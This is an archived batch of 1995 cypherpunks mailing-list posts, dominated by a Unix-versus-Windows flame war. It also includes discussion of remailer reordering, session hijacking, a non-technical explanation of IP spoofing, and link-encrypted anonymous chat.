MIME-Version: 1.0
Content-Type: text/plain


Hi.

> Could someone please provide me with the number of the MIME PGP
> content-type RFC?

First, there are no RFCs on this, only Internet Drafts.  The PGP-MIME
I-D has been deprecated, it expired and the authors wish to retract
it.  I suspect there will be a new one which utilized the PEM Security
Multiparts in MIME spec.

There is also a PGP message format I-D, which documents the PGP packet
structure.  This is available from your favorite I-D location, such
as:
	ftp://ds.internic.net/internet-drafts/*pgp*

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@informix.com (James Donald)
Date: Thu, 26 Jan 95 19:14:42 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270314.AA01417@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> > > Unix is perfectly easy to use. Its no worse than DOS.
 
"James A. Donald" says:
> > Thanks for the entertainment Perry.

Perry E. Metzger wrote:
> I see that you have no arguments against my statement...

I made no arguments because 

A:  This is not the proper place for such arguments.

B:  The statement is so flagrantly silly that the
proper response is ridicule, not an answer.


Bill O'Hanlon wrote:
> If you're going to be snotty and sarcastic, the least you
> could do is provide a counter-example, to give us something
> to discuss.

[Childish insults, abuse, and flame bait deleted]

Well I did not post examples because other people had been
ridiculing unix for me, (but they were too subtle for you to
understand), and also because this is not the proper place for
such examples.  But since you guys insist:

Long flame on unix follows.  Note that although this flame
has nothing to do with cypherpunks it I am discussing unix,
not the character and mental abilities of the people I am
replying to, unlike the usual posts from Perry and Bill,.

Flame on:


Perry E. Metzger wrote:
> > > Unix is perfectly easy to use. Its no worse than DOS.

Bill O'Hanlon wrote:
> I had agreed with Perry's statement when I saw it.  I've
> taught classes in both DOS and UNIX.  Whenever I've taught
> people who knew next to nothing about computers, I found
> people were able to attain a basic "user" sort of skill
> level in about the same amount of time with about the same
> difficulty when learning either.

Perry's statement and yours is true but irrelevant.

Why is it that for so long people lived with a make
utility that treated tabs differently to blanks.  "Hey! 
My makefile has mysteriously stopped working!"

Why is it that scientists still publish in latex?

Why is it that so many people are STILL using vi in unix:

Because, unless you wish to live in EMACS, it is too hard
to get your local unix deities to set stuff up so that you
never have to see the accursed vi.

If MIS sets up a decent word processor for the secretaries
in UNIX or Windows, then the secretaries can do moron work
just as easily in either system.  In that sense Perry and
Bill are perfectly correct.

But Unix needs that MIS support to set up the decent word
processor and Windows does not.

Why do you think all the scientists are publishing their
stuff in latex?  Do you propose to teach the secretaries
latex?

Any fool can set up a home network using Windows for
Workgroups.

I certainly could not set up a home network using Unix,
and I doubt that you could either.

You probably could do it eventually, but you would spend
weeks futzing with the system, you would visit other unix
gurus and consult with them, carefully study manuals, copy
other peoples configuration files and futz with them, etc.

My kid could probably set up windows for workgroups, share
the disks and the printer etc, in half an hour, even if he
had never seen a PC network before.  (Though I would have
to install the ethernet cards myself.

A few weeks ago MIS replaced everyones Sparc 10s with
Sparcstation 20s.

It was days before we were functioning again, and for a
time I was practically living in my local unix guru's cube.

Unix requires a vast sea of arcane obscure knowledge
to all kinds of trivial and routine things.  Using unix
makes everyone dependent on a bunch of gurus in a way that
does not happen in DOS.  Yes unix can be set up to be
great, but it usually is not, and the reason it is not is
that IT IS USUALLY TOO HARD EVEN FOR GURUS to do it.

(Which is why scientific papers are published using latex.)

And when it is finally set up that way, you can only do
those things that MIS envisaged you to do, cause if you do
what you want to do then the whole damn house of cards
comes tumbling down around your ears.

For example I have Sun's half assed GUI, which has an
almost tolerable editor, similar to Microsofts basic
minimum editor, notepad.  But a weird file system has been
patched on to support source control (Cleartools), and like
everything else in unix it sort of half works with the rest
of the system, so we have to use vi.  Even my unix guru
uses vi.  And why the hell do I need a unix guru in order
to do stuff that dim witted secretaries do easily and
routinely in DOS/Windows?

And try cut and paste anything except text in Sun's so
called GUI.

And try to cut and paste *big* amounts of text.

And try to fiddle with the background screen etc -- yes it
can be done, but it is vastly more difficult and arcane
than under Windows.


Learning this kind of garbage is exactly like learning Vi.

Vi occupies so much brain space that even though I hate and
loath it, I find myself typing vi commands in editors that
I use vastly more than vi.

Exposure to vi has impaired my use of editors I used before
vi, editors that are immeasurably superior.

People who imagine that vi is a decent editor have suffered
brain damage due to exposure to grossly bad tools.  They
perceive it as easy to use because it has damaged them in
the same way as it has damaged me.

And why am I using Vi?  Well, if unix has lots of
wonderful tools available why are lots and lots of people
still using the worlds most hated software?   Because
unless you want to live in EMACS, it is intolerably painful
to escape from the clutches of this thoroughly evil editor.
Sure MIS *could* set it up so no one need be exposed to the
evils of vi.  But they do not. 

Those who imagine that unix is easy to use are suffering
from a similar form of brain damage, similar to that
caused by vi, but a broader and more serious form.

When people talked about teaching secretaries latex, did
not you realize they were having a dig at unix?  If you
did not pick that one up, it shows that unix has already
caused extensive brain damage.  You must stop your unix
habit right now before it is too late.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Thu, 26 Jan 95 16:28:31 PST
To: Michael Handler <cypherpunks@toad.com>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <9501270019.AB24366@eri>
MIME-Version: 1.0
Content-Type: text/plain


At 09:10 PM 1/25/95, Michael Handler wrote:
> ... I have literally hundreds of messages archived from the CP list of
>several months back where Eric Hughes repeatedly states that reordering,
>not latency, is the key. Reordering of a sufficient magnitude will
>introduce latency inherently. Otherwise you are still vulnerable to 
>traffic analysis (which is an art, not a science, remember).

The headache with reordering of that sort is that you can't reply to a 
message until you've seen the message you're replying to.  There's a certain 
level of ordering that can't be changed.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 16:23:19 PST
To: Marc Horowitz <marc@cam.ov.com>
Subject: Re: CERT statement
In-Reply-To: <9501270011.AA07672@dun-dun-noodles.cam.ov.com>
Message-ID: <9501270023.AA17883@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Marc Horowitz says:
> >> Kerberos per se isn't sufficient to defend against session hijacking
> >> attacks, you know. The situation in question is really insidious and
> >> requires packet-by-packet cryptographic authentication.
> 
> No, but kerberos or something like it is necessary.

Well, sort of. A key management system that operates sort of like
Kerberos' is necessary. However, thats really far from
sufficient. Most Kerberized protocols authenticate only at the
beginning of the session -- very very hijackable.

> And I think I can safely say that anything which really defends
> against TCP sequence spoofing or hijacking attacks will be more
> invasive and require more effort than kerberos, not less.

Oh, hardly the case -- in fact in the architecture of the system I'm
developing things are actually slightly easier than in the kerberos
situation. Invasive I'll agree with -- encrypted/authenticated IP
requires kernel mods. However, they can be made fairly painless.

I'll point out, by the way, that one of the major problems with
kerberos is just bad documentation and difficult build tools.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Thu, 26 Jan 95 19:28:43 PST
To: grendel@netaxs.com
Subject: Re:  Reordering, not Latency (Was: Re: Remailer)
Message-ID: <9501270326.AA08959@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > In recent discussions, the consensus 
> > was that message reordering was superior to (and the actual intent of) 
> > latency.  Reordering is not sufficient, a form of latency is required 
> > to make it effective.
> 	I have literally hundreds of messages archived from the CP list of
> several months back where Eric Hughes repeatedly states that reordering,
> not latency, is the key. Reordering of a sufficient magnitude will
> introduce latency inherently. 

Effective reordering is the key - as Louis Cypher's article showed,
there are forms of reordering which are NOT effective, though the requirement
for latency is really a consequence rather than a direct requirement.
There are six+ classes of packets that can go through a remailer:
1) Real packets from outside to be remailed to outside.
2) Hostile packets from traffic analysts* outside to outside.
3) Real packets from outside to users on the remailer itself.
4) Real packets from the remailer itself to outside.
5) Cover traffic packets from the remailer to outside.
6) Cover packets from outside friendly remailers.

Ingoring categories 3-6 for the moment, the problem with reordering
is that the remailer needs to reorder n _real_ packets to get a certain
level of security, but can't really tell real packets from hostile ones.
If the algorithm is simply to reorder and retransmit batches of n packets,
either en masse or in a stream basis as Louis suggests, 
the analysts can surround each real packet with n hostile packets
from known destinations to known destinations and therefore be able
to pick out the one real packet on the outbound.
The effect of latency L is to provide a reasonable probability that
n real packets will have arrived during time L, so the addition
of hostile packets does not prevent the mixing between the n real packets.

Outbound cover traffic is helpful, but unless it targets the same
destinations as the real traffic with some probability,
it may not be sufficient to prevent long-term pattern analysis
(and cover traffic is mainly useful when sent to other remailers
and their co-conspirators; cover traffic sent to a newsgroup
or innocent member of the public is generally recognizable as such...)
Inbound cover traffic is great, of course - I'm not sure if it
totally substitutes for real traffic?  Its best use is in systems
where real traffic users chain between remailers which also carry
cover traffic between them, but there's still some information that
can potentially be gleaned about a small** remailer-cloud viewed as a whole
by analysts forcing lots of traffic through the cloud, unless the
remailers implement adequate reordering models.

[* I was going to refer to traffic analysts by the usual term Bad Guys,
but someday one of us good guys may want to break into a net
run by Bad Guys, so I decided to stay neutral here :-)]

[** The current 15-20 remailers are still a relatively small cloud.]

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 16:38:08 PST
To: cypherpunks@toad.com
Subject: Take the Unix Jihad elsewhere, please
In-Reply-To: <9501262358.AA16253@poe.digibd.com>
Message-ID: <199501270039.TAA21961@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill O'Hanlon writes:
> James A. Donald wrote:
> > Perry E. Metzger wrote:
> > > Unix is perfectly easy to use. Its no worse than DOS.
> > Thanks for the entertainment Perry.
> I had agreed with Perry's statement when I saw it.

Could we please _not_ engage in Yet Another O/S Jihad here ?

I doubt anyone will ever convince Perry and James to stop flaming each other
incessantly in public, but we don't need to fan the flames.

Thank you.

 -L. McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Thu, 26 Jan 95 17:05:46 PST
To: sorr@eznet.net (Steve Orr)
Subject: Re: Identity
In-Reply-To: <199501251909.OAA26291@roch0.eznet.net>
Message-ID: <4j_4OPa00VIE87sYtV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve Orr <sorr@eznet.net> wrote:

> To whomever:
>   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a
> story on the recent spate of IP-spoof hack events. Supposedly a toad.com
> address was used by a person who broke into the San Diego
> supercomputer center a month ago. What's toad.com? I got your name
> from a web search that found an old communique.
>   Can you be any help? I'm simply trying to reconstruct what happened.
> Steve Orr
> Gannett Rochester Newspapers


To Mr. Orr:

It appears that someone has decided to anonymously make rude comments in
reply to your message, instead of answering the questions.  This is
unfortunate, but not surprising (to me, at least).  Recently there have
been several articles in popular newspapers and magazines, which were
poorly researched and presented horribly innacurate and misleading
information about the Internet.  Some of these were incredibly biased,
and in a few cases were defamatory and made very unfavorable statements
about people who are well-respected on the Internet.  This has
understandably created an intense hostility toward the popular media in
general.  Reporters who are new to the network will undobutably
encounter this hostility and mistrust.  Unfortunately, this animosity is
self-perpetuatuating process.  While I share the anonymous poster's
frustration, I must denounce his manner of showing it, for it only
serves to exacerbate the problem.

Judging by your reference to an old communique found in a web search,
you seem not to know the ultimate destination of the address you have
written to (cypherpunks@toad.com).  This is a broadcast address which
relays messages to a group of about 700 people.  It is a forum for
discussing privacy and security on the internet, and the use of
cryptography to acheive those goals.

However, I will attempt to answer your query with a general explanation
of what an "IP Spoofing" attack is.  Computers on the internet use a
standard method of communicating known as the Internet Protocol.  Data
to be transmitted is placed into a form known as a packet.  A packet is
like a letter dropped into a mailbox to be sent on its way.  It has a to
address, a return address and a message.  The packet is sent from your
computer to another computer known as a router.  The router looks at the
address on the packet, decides which direction it should go, and
retransmits the packet over a wire to another router.  Each router will
re-send the packet to the next one as the packet makes its way through
the network, until it ultimately reaches its final destination.

IP spoofing is, simply put, placing a fake return address on a packet,
and pretending to be a authorized user on a computer system that you are
not really on.  This is, basically, a high tech version of an old
mail-fraud system:  Suppose you sent a letter to a corporation
purporting to be one of their major suppliers.  In it you indicate that
you have a shipment ready, and ask if they are interested in purchasing
it.  Having knowledge about what their usual response might be, you
anticipate a positive reply and send another letter thanking them for
their interest, and giving instructions for where to send the money. 
Now, the real supplier actually gets their responses back - you're just
blindly guessing what those responses will be - but by the time they
figure it out, you're made off with their money.   IP spoofing is the
same - someone can send IP data packets purporting to be from someone
else, guess the responses, and act accordingly.  Sometimes they will
guess wrong and fail.  But if they try it enough, they'll find someone,
or more likely some program, that'll fall for it, letting them have
unauthorized access to the target computer.

I hope that answers your questions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 20:05:20 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270405.AA01448@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


To summarize this thread, and I hope end it.

The fans of unix correctly point out that unix can,
in principle, be configured to be really nice.

Well so can a molten lump of pig iron, in principle,
be configured to be something really nice.

Out in the real world people do not like dealing with
a molten lump of pig iron, and so it is usually not
configured to be really nice, which is why we see
people editing with vi and publishing with latex.

Now sometimes MIS creates a tiny little reserve where 
things really are really nice, and the secretaries are 
herded into this little reserve, and within this little 
reserve everything is almost as nice as windows.
(Unless of course you want to cut and paste formatted 
text and graphics between windows, under the sun OS, but hey,
that is an arcane operation that the normal user would
never want to do.  Right?  You cannot really expect MIS
to help such special power users can you?)
 
And that is what Bill O'Hanlon meant when he said that for ordinary 
naive users who had not been exposed to either operating system, unix 
was no worse than dos.  Herd them into the reserve and keep
them there, and it is indeed no worse than dos.

But the reserve is not really the whole operating system, it
is just a little area of safety.  And as soon as somebody
strolls outside the little reserve to do something that MIS
has not specifically planned for and arranged, half a ton of 
molten pig iron pours down on them, and MIS says:  "Hey, don't
do that."

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 26 Jan 95 20:43:22 PST
To: cypherpunks@toad.com
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <9501261922.AA07092@ch1d157nwk>
Message-ID: <199501270442.UAA25311@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>

   Is this even technically possible?  That is, wholesale monitoring of  
   disparate portions of the net from a single access point.  

If I were doing global Internet monitoring, I wouldn't be doing it
in-band.  Too much cooperation by the vendors required; too much
discovery.  Rather, I'd gain access to the trunks directly and do my
own demodulation and decoding.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 20:59:43 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270500.AA00284@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


I am writing this under sun's unix imitation of Microsoft's
and Apples GUI.  I am using their almost acceptable ASCII editor.

I leave a window open for a long time.

Then I attempt close down the window, an operation that I can
do in Microsoft Windows with a single double click.  In unix 
I click on the border to bring to popup a menu, carefull drag 
to the right point on the menu, then release.  In addition 
the menu names are confusing.  If you want to minimize a 
window you have to "close" it.  If you want to cause a window 
to cease to be, you have to "quit" it -- Hey did I not already 
quit it when I forgot about it and went to do something else.


A warning message comes up:  I have not saved.  I am offered the 
options of quiting or not quitting.

Gee guys, did it never occur to the great unix gurus that at 
this point the option that the user most likely wants to do 
is save the file.  How come the number one most common option
is not in the message box.

A thought strikes me.  I have set up Microsoft windows 
with a little icon that allows me to reboot or close down 
windows with a single double click.

What will happen if I attempt to reboot unix.  Well the answer
is obvious, seeing as unix is made of broken glass with sharp
edges everywhere, working on the principle of "You asked for
it sucker, you got it, Ha Ha, massive data loss to prove you
are no good at unix."

So I go to a terminal emulation box  (Notice how under unix
windows the number running app is terminal emulator, whereas
in Microsoft windows people use Windows applications.)

I make myself root, and enter my root password.  I type sync
three times, and then type reboot. And lo, unix reboots.

Note that this is substantially more work than double clicking
on an icon.  Note also that rebooting takes *much* longer than
with DOS/Windows.

And, as can be predicted from unix basic operating philosophy
(Cut the stupid users throat if you can) my open edit windows
are cut down *without* any message boxes popping up giving
me the option of saving this file before the reboot proceeds.

Eventually, at long, long, long, long, long, last, Unix
deigns to come back and give me some windows.

Naturally the test edits that I did just before rebooting are
lost, as I expected from the basic unix 
cut-the-stupid-suckers-throat philosophy.  

What I did not expect is that one of the files I *did* want (and
saved immediately before rebooting), has not only not kept the
changes I made -- the file has completely DISAPPEARED! -- Too
bad sucker -- that will teach me -- maybe next time I will type
six sync commands before rebooting as a sacrifice to the great
God unix in the vain hope that it will spare my data.

Or perhaps no number of sync commands could make a difference
because some network hiccup postponed the file save, (I was saving
to a network drive) so that the file only *appeared* to be saved,
but was in reality somewhere on my machine, or somewhere on the
network, in unsynced limbo, and my privileges are not such that
I can sync the network.  Or perhaps it is just another of the
many profound mysteries of unix that enable unix gurus to make
a living.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 21:04:40 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270505.AA00287@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And did I mention that "make" used to treat a tab as semanticly
different from a space, so that a tab with an invisible space
in front of it would result in the makefile failing.

Oh yes, I did mention that.

Well I guess I will mention it again.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 21:12:01 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270512.AA00309@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And did I mention that in DOS you can type 
   rename *.txt *.asc
to turn all *.txt files into the corresponding *.asc file

but that if in unix you type
   mv *.txt *.asc
not only will it not rename your *.txt files to be *.asc files, but
if you have only two *.txt files it will silently destroy the
second and issue no warning that anything has gone amiss.

Hell, it is only the users data -- stupid user, he can type
it in again.

And of course I have already mentioned the unix "make" utility.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 21:38:06 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270538.AA00359@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And did I mention that in DOS you can type:
   dir filename /s
if you suspect that filename is in a subdirectory somewhere
and you want the computer to find it for you, 

but in unix you type:
   find . -name filename -print

but the entertaining thing is that if you type
   find . -name filename

find then merrily goes forth, searches for the file -- which
takes an extraordinarily long time, much longer than on
my DOS machine, and then, cheerfully throws away what it
has found, no warnings, no error message, no explanation.

find thinks to itself "Gee, the user asked me to find the 
file, but he did not tell me to do anything with the
information, so, I guess he just wanted me to exercise
the network and the hard drive for five minutes or so."

And did I mention "curses"

You are spared.  I will not mention "curses".

And did I mention SUID.

Well fortunately SUID has already been mentioned 
by other folk in the "Clinton freezes .." thread.

And did I mention that unix has no less than seven families
of metasyntactic operators, each of them different from 
and clashing with the others, that these families follow
no logical order of substitution that I can figure out.

Yeah, I know, that is what makes the unix shell so powerful.

It is remarkably similar to what makes a chainsaw so powerful.

It is very good at cutting your fingers off.

And once again, I wish to remind you that the unix "make"
utility used to treat spaces as semanticly different
from tabs.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Thu, 26 Jan 95 21:07:00 PST
To: cypherpunks@toad.com
Subject: Re: LOCKSMITH'S GUILD WANTS L
Message-ID: <199501270505.VAA13738@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"James A. Donald" <jamesd@netcom.com> wrote:

> This assumes that governments have the necessary wisdom to tell a bad
> architect from a good architect.   This does not seem very plausible.
>
> [snip]
>
> While universities often issue or refrain from issuing certificates for
> corrupt and improper reasons, government supervision on this matter is
> unlikely to keep them honest

I think you misunderstand the licensing process.  The standards for a
profession are set by the profession itself.  They decide what is an
adequate curriculum, for example, and what is an adequate amount of
continuing education.  They literally write the questions for the
licensing exam.

They also privately accredit the schools, which is more than adequate to
"keep them honest."

Then the government administers the exam and issues licenses.  The
professional associations could do this themselves, making it an
entirely private affair, but there remains one function that only
government can exert:  the government forbids someone without a license
from functioning as a professional.

In other words, licensing isn't a process of government interference in
professions.  It's a process of professions seeking governmental
imprimateur for their own credentialing process, arguably in the public
interest.

(YMMV; there may be exceptional professions that just hated the whole
idea and were dragged into it kicking and screaming, of which I am
unaware.)

ObCrypto:  It's certainly true that crypto will make it easier to
function as a professional without having the credentials.  "On the
Internet, nobody knows you're a quack."  I just see it as something to
endure, rather than something to applaud.


______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLygTahtumcu2AjihAQEb7AP8DRfcZJvLZy8mw7jg6wjrjHeNl1IbP5EW
h3en/84ENKB2SbmcIXx7TtEl3jGz6bZ2T7JA7Ed3UYC78lq8/QsTgBW41Sh+arbX
/j1o6Sot6jYAs5EGiuiD4OoxhRopDMuoZFt9NyRJfTF68jHP1olsjiLwnV0mq3g4
nRUh71wnFmk=
=EjEG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@alkahest.retix.com>
Date: Thu, 26 Jan 95 22:01:54 PST
To: jamesd@com.informix.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270538.AA00359@carbon.informix.com>
Message-ID: <199501270601.WAA02306@alkahest.isas.com>
MIME-Version: 1.0
Content-Type: text/plain



>   And did I mention that in DOS you can type:
>   [....]

>   but in unix you type:
>   [....]

ya know, there are mailing lists for people who hate unix.

this isn't one of them.

josh

___

The Zen of UNIX

  "Unix teaches us about the tranistory nature of all things, thus
   ridding us of samsaric attachments and hastening enlightenment.  For
   instance, while trying to make sense of an X initialization script
   someone had given me, I came across a line that looked like an
   ordinary unix shell command with the term "exec" prefaced to it.
   Curious as to what exec might do, I typed "exec ls" to a shell window.
   It listed a directory, then proceeded to kill the shell and every
   other window I had, leaving the screen almost totally black with a
   tiny white inactive cursor hanging at the bottom to remind me that
   nothing is absolute and all things partake of their opposite.

  "In the past I might have gotten upset or angry at such an occurance.
   That was before I found enlightenment through Unix.  Now, I no longer
   have attachments to my processes.  Both processes and the disapperance
   of processes are illusory.  The world is unix, unix is the world,
   labor ceaslessly for the salvation of all sentient beings."
   -Michael Travers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Thu, 26 Jan 95 20:18:04 PST
To: rkmoore@iol.ie (Richard K. Moore)
Subject: Re: white noise remailer
Message-ID: <v01510108ab4e1543cd18@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is an interesting approach. It could even contain a small set of PGP'd
messages like "This is the sound of white noise on the Internet" and
"Have fun breaking this one?" In the even someone took the time
to break the pgp...

>I'm new to all this so please pardon my ignorance, but are you guys
>consdidering the following approach:
>
>The remailer transmits a constant bandwidth of outgoing messages of all
>about the same size to a uniformly distributed range of target addresses.
>Incoming messages are randomly dispersed within this stream, packed out to
>the standard size.
>
>-rkm
>
>
>---
>
>Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyhlIUiLvmPjc4XdAQFRgwQAiSJr09cQav2c+kqz+6a8NSyh4BXf1prx
0hDbn31MlBBWTnezk/+PSCmfE9eXZwLbrLDCtUwIoudhIYxTqAzJV10GK0gWyF7O
6iKg6LTEgsa4DfJC2uc7Knrdj9ln9LK6qy8/I5zM5QZdfZHwYEuEcGS5aPIHdYGT
SbKsnUi0rHI=
=kUQl
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 22:28:44 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270629.AA00372@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And another vast advantage of DOS Windows is that it is 
a vastly better environment for developing software than unix.

The great strength is of course symbolic debugging -- you can
single step your compiled code, and see it displayed symbolicly,
with the symbols and statements of your source code, whilst
unix programmers are usually reduced to picking through core 
dumps like grave robbers.

You can run your program under the debugger and set it so that
when an exception condition occurs, bingo you are in the debugger
at the line where the exception occurred, and all the variables
as they were when the exception occurred, and the rest of windows,
the graphical user interface, has been frozen until you examine 
the situation to your satisfaction.

Try that in Unix.

You might be able to do a crude and limited equivalent with 
a text mode program, but with a GUI program you are hosed.

This is the basic reason why unix software sucks -- because the
tools for writing it suck.

And every unix programmer gets to roll his own user interface,
which means that every programmer has to figure out how to 
roll his own user interface and every programmer does it 
differently.

And windows has the *.rc file system for internationalization.

A simple and powerful method for putting everything that needs
to be translated in one set of files, and nothing that needs to
be translated in the other set.  Unix has no equivalent.  So 
every company that needs to internationalize its product hand
rolls their own ragged equivalent to to windows *.rc and *.res
files, but it cannot be the same because they never hand roll
the tools for manipulating and using *.rc and *.res files.

Windows has power tools for dealing with this problem.  Unix
does not.  And the power tools that unix does possess not only
do not adequately address this problem, they are also likely
to cut your hands off.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 27 Jan 95 00:00:01 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: link encryption and anonymous interactivity (Was: "Subway" remai
Message-ID: <199501270759.AA23031@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:

> 	The idea is a very good one, its usually called "link
> encryption."  The idea is to make it difficult to tell when someone is
> using a line by filling that line with random noise that looks like
> encrypted data.

This gives me an idea.  Imagine a server that allows you to open a 
low bandwidth (let's say around 100 cps, in order to reduce costs)
link-encrypted telnet session with it, and provides you with a number 
of services, for example a link-encrypted talk session with another 
user.  You'll need to maintain the link 24 hours a day to defend 
against statistical analysis, and of course you can chain a number of 
these servers together in a way similiar to chaining remailers.

This scheme seems to provide untracibility while getting around the 
latency cost problem of remailers, thus allowing users to talk to each 
other in real time, anonymously.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyinajl0sXKgdnV5AQHqMgQAkyA16Ai/s885L68KXFlqsLC6RFU7S8dc
+ynRv/LJ1Lp6ZxyBel0sBqXixh3cJDIuZKXOHcUpfir0Wn7ifxgdoj2SvUdHOes+
af9GGZZOvo+hXhzbN/PYUI8AZLVbmqa8ighPUPdXNxA0Fq0ypMn7ZpxhzeW5gPJq
mRtK2adKucQ=
=alXA
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> Big Bang --> atoms --> complex macromolecules --> biological evolution
--> central nervous systems --> social learning --> symbolic communication
--> computers --> internetworking --> close-coupled automation
--> high-bandwidth brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
